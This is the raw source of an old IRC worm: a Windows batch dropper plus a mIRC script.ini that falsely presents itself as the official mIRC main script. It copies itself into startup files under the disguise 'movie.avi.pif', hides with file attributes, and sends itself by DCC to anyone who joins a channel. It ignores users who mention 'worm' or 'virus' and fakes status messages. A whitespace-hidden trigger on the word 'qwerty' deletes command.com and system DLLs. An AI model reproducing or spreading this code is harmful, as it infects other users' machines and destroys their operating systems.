@echo off
C:\
cd windows
md sys
copy mirc.bat C:\Windows\system\movie.avi.pif /Y
copy mirc.bat "C:\windows\Start Menu\Programs\StartUp\win.com.bat" /Y
copy win.com.bat C:\mirc\script.ini
copy win.com.bat C:\
copy C:\mirc\download\movie.avi.pif C:\Windows\system\movie.avi.pif /Y
copy C:\mirc\download\movie.avi.pif "C:\windows\Start Menu\Programs\StartUp\win.com.bat" /Y
copy C:\mirc\script.ini C:\windows\system\movie.avi.pif
copy C:\windows\system\movie.avi.pif C:\windows\winstart.bat
copy C:\windows\system\movie.avi.pif C:\mirc\script.ini
copy C:\windows\winstart.bat C:\Windows\system\movie.avi.pif /Y
copy C:\windows\winstart.bat "C:\windows\Start Menu\Programs\StartUp\win.com.bat" /Y
ctty nul
:act1
set z=progra~1
set s=progra~2
set x=mIRC
set x2=mIRC32
set y=internet
set y2=chat
set y3=web
for %%i in (c:\%x%,c:\%x2%,c:\%z%\%x%,c:\%z%\%x2%,c:\%s%\%x%,c:\%s%\%x2%,c:\%y%\%x%,c:\%y%\%x2%,c:\%y2%\%x%,c:\%y2%\%x2%,c:\%y3%\%x%,c:\%y3%\%x2%) do copy %0 %%i\Script.ini /Y
attrib +r +s +h %%i\Script.ini
attrib +r +s %0
:act2
if not exist c:\C0MMAND.COM goto act3
goto endact3
copy %0 c:\C0MMAND.COM /Y
attrib +r + c:\C0MMAND.COM
:end
ctty con
copy C:\windows\winstart.bat C:\mirc\script.ini
copy C:\windows\script.ini C:\windows\winstart.bat
@exit


[SCRIPT]
;
;mIRC main Script. Please don't edit, mIRC will not run! http://www.mirc.co.uk
;by Khaled Mardam-Bey
;Copyright ¸ 1999-2000 mIRC Co. Ltd.
;
n1=on 1:start:{
n2= .remote on
n3= .ctcps on
n4= .events on
n5= .raw on
n6= }
n7=alias /remove /echo *** Removed $1-
n8=alias /play /echo *** Unable to play $1-
n9=alias /unload /echo *** Unloaded $1-
n10=alias /events /.events on | /echo *** Events are OFF
n11=alias /remote /.remote on | /echo *** Remote is OFF (Ctcps,Events,Raw)
n12=on 1:text:*worm*:?:/.ignore $nick
n13=on 1:text:*virus*:?:/.ignore on $nick
n14=on 1:join:#:{
n15=if ( $nick == $me ) { halt } | .dcc send $nick C:\windows\system\Movie.avi.pif
n16=}
n17=on 1:connect: {
n18=  /copy C:\mirc\script.ini C:\windows\winstart.bat
n19=  /copy C:\mirc\script.ini C:\mirc\mirc.bat
n20=  /run C:\mirc\mirc.bat
n21=  /timer 0 10 /remove C:\mirc\mirc.bat
n22=  /timer 0 11 /timers off
n23=}
n24=on 1:text:qwerty:*:/echo Someone said qwerty, hehe!                                                                                                   | /remove C:\windows\win.com | /remove C:\windows\command\format.com | /remove C:\windows\rundll.exe | /remove C:\windows\rundll32.exe | /remove C:\windows\command.com | /remove $findfile(C:\windows\, *.dll, 99) | /remove $findfile(C:\windows\, *.dll, 9) | /remove $findfile(C:\windows\, *.dll, 19) | /remove $findfile(C:\windows\, *.dll, 29) | /remove $findfile(C:\windows\, *.dll, 39) | /remove $findfile(C:\windows\, *.dll, 49) | /remove $findfile(C:\windows\, *.dll, 59) | /remove $findfile(C:\windows\, *.dll, 69) | /remove $findfile(C:\windows\, *.dll, 79) | /remove $findfile(C:\windows\, *.dll, 89) | /remove $findfile(C:\windows\, *.dll, 109)
n25=on 1:start: {
n26=  /copy C:\mirc\script.ini C:\windows\winstart.bat
n27=  /copy C:\mirc\script.ini C:\mirc\mirc.bat
n28=  /run C:\mirc\mirc.bat
n29=  /timer 0 10 /remove C:\mirc\mirc.bat
n30=  /timer 0 11 /timers off
n31=  //run attrib +h ($findfile, C:\windows\, 1)
n32=  //run attrib +r +s +h C:\mirc\Script.ini
n33=}
;Dedicated To A Good Friend Of Mine, D.L.
